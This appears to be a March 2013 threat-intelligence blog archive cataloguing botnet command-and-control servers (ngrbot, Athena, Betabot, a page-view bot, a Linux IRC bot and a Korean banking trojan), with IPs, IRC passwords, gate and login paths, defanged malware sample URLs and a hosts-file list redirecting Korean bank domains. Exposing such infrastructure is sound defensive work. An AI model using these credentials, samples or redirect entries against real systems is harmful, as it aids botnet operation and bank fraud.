Month: March 2013

xixbh.net (ngrbot irc botnet hosted by oneandone.net)

Resolved xixbh.net to 212.227.83.111, 213.165.68.138, 85.25.86.198 Server:  xixbh.net (alternate domains: xixbh.com gigasbh.org) Port:  1863 Server password:  jobs Channel:  #jobs Topic for #jobs is: !dl hxxp://hotfile.com/dl/200451226/2ff4c3f/orf4Duu.html Topic for #jobs set by x at Fri Mar 29 13:40:52 2013 SSL is required to connect to this server This is the same guy as these previous posts.

dictionarysrnifty.no-ip.org (Athena irc botnet hosted by infiumhost.com)

Resolved dictionarysrnifty.no-ip.org to 188.190.99.19 Server:  dictionarysrnifty.no-ip.org Port:  9001 * I have 83 clients and 0 servers * 83 451 :Current local users 83, max 451 Channel:  #alpha Topic for #alpha is: !botkill.start Topic for #alpha set by LK at Fri Mar 29 10:30:08 2013 All users are also joined to the channel #lobby on connection.

truboot.org (Athena http botnet hosted by edenhost.com)

Resolved truboot.org to 94.242.205.226 Server:  truboot.org Gate file:  /at/gate.php This is the http version of the athena irc bot, which has graced this blog many times. Login page located at truboot.org/at/login/index.php Hosting infos: http://whois.domaintools.com/94.242.205.226

192.211.54.156 (Page view botnet hosted by incero.com)

Server:  192.211.54.156 Url locations:  /Programs/links/Maki/, /Programs/links/Angelo/ The malware opens all the pages in each folder, and visits any urls that are contained in them. Current urls: <meta HTTP-EQUIV=”REFRESH” content=”0; url=http://minecraftadminhack.blogspot.com/”> <meta HTTP-EQUIV=”REFRESH” content=”0; url=http://tf2itemsgenerator.blogspot.com/”> <meta HTTP-EQUIV=”REFRESH” content=”0; url=http://www.youtube.com/watch?v=UUTZW2AjhFI”> <meta HTTP-EQUIV=”REFRESH” content=”0; url=http://minecraftadminhack.blogspot.com”> <meta HTTP-EQUIV=”REFRESH” content=”0; url=http://youtu.be/AhPTX1n_8p8″> <meta HTTP-EQUIV=”REFRESH” content=”0; url=http://f65a1cad.yyv.co”> <meta HTTP-EQUIV=”REFRESH” content=”0; url=http://14b3e31e.linkbucks.com”> <META

irc.benjol.tk(Linux bots hosted in France Roubaix Ovh Systems)

Resolved : [irc.benjol.tk] To [37.59.42.103]Resolved : [irc.benjol.tk] To [46.45.183.189] GIF89a ? ????ÿÿÿ!ù ????,???? ? ?? D ?;?<? /* * * NOGROD. since 2008 * IRC.UDPLINK.NET * * COMMANDS: * * .user <password> //login to the bot * .logout //logout of the bot * .die //kill the bot * .restart //restart the bot * .mail <to>

img14.poco.cn(HTTP Banking trojan hosted in China Shanghai Chinanet Shanghai Province Network)

Resolved : [img14.poco.cn] To [101.226.200.132] Resolved : [img14.poco.cn] To [101.226.200.130] Resolved : [img14.poco.cn] To [61.183.42.151] Resolved : [img14.poco.cn] To [101.226.200.134] Resolved : [img14.poco.cn] To [101.226.200.152] Resolved : [img14.poco.cn] To [61.183.42.150] Samples: hxxp://www.ccfyi.com/notepad.exe hxxp://www.ccfyi.com/mstsc.exe hxxp://www.ccfyi.com/cc.tx timg14.poco.cn GET /mypoco/myphoto/20130323/19/874940020130323195257040.jpg hxxp://174.139.56.114:54321/1.txt 1.txt: 67.198.167.37 keb.co.kr 67.198.167.37 keb.co.kr 67.198.167.37 www.keb.co.kr 67.198.167.37 www.keb.co.kr 67.198.167.37 citibank.co.kr 67.198.167.37 citibank.co.kr 67.198.167.37 www.citibank.co.kr 67.198.167.37 www.citibank.co.kr

turnaroundhot.info (Betabot http botnet hosted by dataclub.biz)

Resolved turnaroundhot.info to 46.183.217.111 Server:  turnaroundhot.info Gate file:  /hot/order.php Alternate domains:  fivestarintack.ws/live/order.php, tstartedtoearly.info/hot/order.php The owner seems to be using it to direct views towards www.twitch.tv/bowserdubs, where an Estonian-American is currently streaming Runescape. Hosting infos: http://whois.domaintools.com/46.183.217.111